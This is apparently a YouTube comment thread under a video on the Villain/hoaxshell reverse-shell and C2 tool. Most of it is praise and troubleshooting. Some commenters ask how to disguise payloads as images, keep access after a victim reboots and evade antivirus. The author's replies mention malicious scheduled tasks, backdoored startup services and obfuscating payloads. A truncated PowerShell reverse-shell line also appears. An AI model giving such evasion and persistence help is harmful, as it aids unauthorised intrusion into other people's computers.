Thank you, my friend, that you are not brilliant, but you talk and think that most of those who watch you are professionals. I hope you will take into account that we are new to this field.
there's a bug in the coolest shell (the cmd one) but let's leave it like that. these who know a little bit of batch will be able to pinpoint this miniscule issue in a heartbeat and those that don't probably shouldn't be using it anyway. wish it was more stable though because i like the idea. gotta try expanding this one template
@@HaxorTechTones I hosted the c2 under my domain with a real cert, not self signed. hence i picked the hoax/https cmd with curl. The payload simply doesn't execute in the current version without a simple modification on windows 10. The problem lies in the iterational part of the payload, i already feel like i said too much. let's not get it signatured too early. it's a byte too short. the easiest way to understand it is to know the difference between pasting the payload into the cmd and launching it out of a bat file - that's how i spotted it. each of the ways of starting it gave me different errors so i pinpointed it rather quickly, but if you still wanna know i insist on different channels of communication
When I execute the payload on the target machine windows doesn't flag it or stop it ,and it's like it worked but when I check back on the attacker computer there's no shell session? Does the victim computer also have to have netcat?
how do i put hoaxshell payloads into : . ps1 file and just fake to. png or some image file extension, and when they click on it executed and just hide or close the powershell right away
Dude, your project is great... But I have some issue with villain...I can't jumped into cmd, I am unable to download file and execute file through this shell.. And some commend doesn't work... can you tell me how to solve it... Please reply 🙏... Thank you
Why does my netcat tcp reverse shell lose connection after a while without doing anything? I managed to establish the connection and after aprox 5 mins it loses connection, why is it doing that?
It shouldn't be doing this, never had that issue. You need to provide some info, maybe open an issue on github with screenshots. Does the shell session stop working or does villain mark the connection as lost? Are you sure there's no event occurring that leads to the session loss?
@@HaxorTechTones ok so I forgot to mention that i am using ngrok and it seems that the problem occurs only when using ngrok, because I don't have this problem inside my LAN.
Dude you doing great.. But how can we maintain persistent.. If we don't make persistent..then there is nothing in this tool.. Please tell me how can we maintain persistent
I need help. After uploading the payload to the powershell it won't establish the connection, it doesn't show the message:"Backdoor session established on ...".Does it only happen to me? Someone help me pls.
@@philxdes1573 The problem was that I had a bad configuration of kali linux in virtual studio code. Try going to the settings of the machine, to the network option and change the first option to bridge adapter.
Hi ! Do I need to use obf payload in order to use the upload tool ? I'm getting denied access response when I'm trying to copy simple texts to my desktop ?
@@HaxorTechTones It seems better but still not working, when I keep my hard disk name it says : the generic path isn't resolved when I just type the path from /users, as you did, it says : non-conforming character (translate from french, hope you will get it :/)
Ok just got it !!! The problem was that I kept writing the full path, like I was in C:/Users/TheGuyIAm and I kept writing C:/Users/TheGuyIAm/Desktop/TheFileIWant when I should have written /source_path \desktop\TheFileIWant
when i try using it, it doesnt send back any sort of connection or message at all to villain. i send it in powershell and did everything the exact same that you did. Any idea how to fix it?
No, you would have to work on persistence by e.g., injecting a malicious periodically executed task or backdoor a startup service. The content on this channel is for authorized assessments. Don't try weird monkey stuff against machines you do not have permission to test.
@@osmanali176 you can do it manually from within powershell... you can make a script that uploads files to dropbox using dropbox api... theres a tutorial here youtube.
why am i getting this error when I try to do the same ? At line:1 char:1 + Start-Process $PSHOME\powershell.exe -ArgumentList {$client = New-Obj ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ScriptContainedMaliciousContent
You're always making incredible projects, love what you do !
Thanks so much!! 🤩
Thank you, my friend, that you are not brilliant, but you talk and think that most of those who watch you are professionals. I hope you will take into account that we are new to this field.
Thx for your project . It is very fantastic
You are amazing man i love the project keep it up
A new subscriber for this dude here from Morocco
Great work.
Thanks for the support!
🎉🎉🎉 love the new changes!
Wow awesome job t3l3machus ⚡⚡
Thank you!
Love this :)
Thank you 💚
Great to see it! :)
Best my friend
Amazing as always ❤❤
This is so good, and you are one hell of a software developer👍 I hope your employer pays you well my friend!
Welcome back 🔙
Good to be back
товарищ
Amazing bro 😍😍
nice
there's a bug in the coolest shell (the cmd one) but let's leave it like that. these who know a little bit of batch will be able to pinpoint this miniscule issue in a heartbeat and those that don't probably shouldn't be using it anyway. wish it was more stable though because i like the idea. gotta try expanding this one template
So, what's the bug mate?
@@HaxorTechTones I hosted the c2 under my domain with a real cert, not self signed. hence i picked the hoax/https cmd with curl. The payload simply doesn't execute in the current version without a simple modification on windows 10. The problem lies in the iterational part of the payload, i already feel like i said too much. let's not get it signatured too early. it's a byte too short. the easiest way to understand it is to know the difference between pasting the payload into the cmd and launching it out of a bat file - that's how i spotted it. each of the ways of starting it gave me different errors so i pinpointed it rather quickly, but if you still wanna know i insist on different channels of communication
When I execute the payload on the target machine windows doesn't flag it or stop it ,and it's like it worked but when I check back on the attacker computer there's no shell session? Does the victim computer also have to have netcat?
how do i put hoaxshell payloads into : . ps1 file and just fake to. png or some image file extension, and when they click on it executed and just hide or close the powershell right away
Hi bro
Hey bro your work is awesome... Can you please tell me how to persistent it.. How can we get connection afer reboot victim pc.. Thank you
Hey, thanks! That's kind of complex to pull off. I might make a video about it in the future :)
@@HaxorTechTones thanks bro😃
Dude, your project is great... But I have some issue with villain...I can't jumped into cmd, I am unable to download file and execute file through this shell.. And some commend doesn't work... can you tell me how to solve it... Please reply 🙏... Thank you
Please make a video to port forwarding 🙏
Hello! What an incredible project! Tell me is there any way to migrate connection to meterpreter?
Hi, thanks! Not yet, working on it. Stay tuned!
how can i take a screenshots desktop
from the target machine
how to use persistence? give me answer
Error parasiong LHOST, Invalid Ip or interface am trying to use ngrok ):
the backdoor work with php file ?
Why does my netcat tcp reverse shell lose connection after a while without doing anything?
I managed to establish the connection and after aprox 5 mins it loses connection, why is it doing that?
It shouldn't be doing this, never had that issue. You need to provide some info, maybe open an issue on github with screenshots. Does the shell session stop working or does villain mark the connection as lost? Are you sure there's no event occurring that leads to the session loss?
@@HaxorTechTones ok so I forgot to mention that i am using ngrok and it seems that the problem occurs only when using ngrok, because I don't have this problem inside my LAN.
Dude you doing great.. But how can we maintain persistent.. If we don't make persistent..then there is nothing in this tool.. Please tell me how can we maintain persistent
I need help. After uploading the payload to the powershell it won't establish the connection, it doesn't show the message:"Backdoor session established on ...".Does it only happen to me? Someone help me pls.
im having the same issue, have you figured it out?
@@philxdes1573 The problem was that I had a bad configuration of kali linux in virtual studio code. Try going to the settings of the machine, to the network option and change the first option to bridge adapter.
Is it possibile to do a persistent shell?🙏
bro pls add download option.
thank you for the tool 💖
Hi ! Do I need to use obf payload in order to use the upload tool ?
I'm getting denied access response when I'm trying to copy simple texts to my desktop ?
Make sure to add the file name to the path you want the file to be uploaded, not only the dir.
@@HaxorTechTones It seems better but still not working,
when I keep my hard disk name it says : the generic path isn't resolved
when I just type the path from /users, as you did, it says : non-conforming character (translate from french, hope you will get it :/)
Ok just got it !!!
The problem was that I kept writing the full path, like I was in C:/Users/TheGuyIAm and I kept writing C:/Users/TheGuyIAm/Desktop/TheFileIWant when I should have written /source_path \desktop\TheFileIWant
@@HaxorTechTones And thx ! You're the best !
One last question, I tried connecting to an FTP server using Villain but kept blocking at the connection step, is it normal or ?
well done do you accept pull requests?
Hi, thanks! Currently, I don't. kind of figuring out the direction of the project.
when i try using it, it doesnt send back any sort of connection or message at all to villain. i send it in powershell and did everything the exact same that you did. Any idea how to fix it?
sir port forwarding
My villain isn't working 😢
It doesn't get a reverse shell
Can i run .ps1 script on Kali into Windows Machine with Villain? Cause .ps1 script is detected by Windows Defender on Windows
obfuscate don t work anymore, can you say me tools for this?
Sir, why can't I upload files?
ok now we need how to bypass antivirus.
ruclips.net/video/grSBdZdUya0/видео.html
does it support the single payload works for many victims as it previously supports only 1 payload 1 victim as far as i know
i dont think so...
You can use TCP socket based reverse shell commands to do that, those are reusable. The hoaxshell ones are one timers
sir, it is still detecting generate powershell. But i like your video.
you are amazing!!! How can upload to remote file path with blank spaces? = upload /localpath/text.txt
emotepath\blank space\text.txt?
Hello! is there a way to download stuff from the victim pc? I tried everything but couldn't maybe I just suck :*)
Hi, in an automated manner, like, "download /path/to/file", not yet unfortunately, but the feature will be added in a future update :)
@@HaxorTechTonesYoooo! You are the best
It this work over internet by ngrok or something
dig a little bit ;)
if victom pc restart will vilain still work plz anwser ??
No, you would have to work on persistence by e.g., injecting a malicious periodically executed task or backdoor a startup service. The content on this channel is for authorized assessments. Don't try weird monkey stuff against machines you do not have permission to test.
@@HaxorTechTones i know i just ask and im 14 year im begener in hacking can if a make that file auto run file
How can we bypass Anti-virus as these payloads are detecting it?
The trick is to edit the payload templates and replace the commands with obfuscated versions of them. I'll make a how-to video about it soon.
@@HaxorTechTones thanks bro I am waiting for it😁
Can we download files from the backdoor system?
not yet ¯\_(ツ)_/¯
@@HaxorTechTones ok bro
Can we download files using the shell?
@@osmanali176 you can do it manually from within powershell... you can make a script that uploads files to dropbox using dropbox api... theres a tutorial here youtube.
@@johnazure can you share me the link?
Pal if you don’t mind can I have the old version of villain pls?
You are breaking my heart. Why?
Nothing like that I just want the older version
I am just more comfortable with the older one that’s all
@t3l3machus so can I have it...
I will add it in the github "releases" soon
buddy you need to add channel tags to get views
👍
why am i getting this error when I try to do the same ?
At line:1 char:1
+ Start-Process $PSHOME\powershell.exe -ArgumentList {$client = New-Obj ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
Because the payload is getting caught by your anti-virus. Check out this video on how to bypass it -> ruclips.net/video/grSBdZdUya0/видео.html